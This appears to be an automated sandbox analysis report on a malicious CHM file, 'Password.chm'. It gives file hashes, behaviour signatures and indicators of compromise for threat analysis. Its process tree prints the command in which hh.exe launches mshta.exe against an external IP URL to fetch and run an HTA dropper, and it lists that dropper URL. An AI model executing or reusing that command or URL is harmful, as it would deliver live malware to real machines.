Analysis

  • max time kernel
    57s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    21/03/2023, 23:22

General

  • Target

    Password.chm

  • Size

    10KB

  • MD5

    c80560d6ff29aa290946f8d9ca13cbb4

  • SHA1

    a284b6c89566e89e4ab9b898614a748f3eeabbdc

  • SHA256

    319e0ce31dcb93daa89cce395ec63a3ddc43c8f6cc23234a6099c2bfc6654067

  • SHA512

    08f816b088df762e5d157436843b1a2287a02a293504540f9aaf4aa5e309573a0d58a629a4aad6992397cc1e805bad8e6f3de3792461e0567a50e4a11f8f44fe

  • SSDEEP

    48:QOltiLg830TQRlEFlErlElub5sza5CVRCAiPsa9HjwiRiMKQ4XJqTWatMIdcXVi/:QOXCRdwRFaXH4ZqdtKXVi4IP6

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://141.105.65.165/data/3.html

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Password.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      PID:1176

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads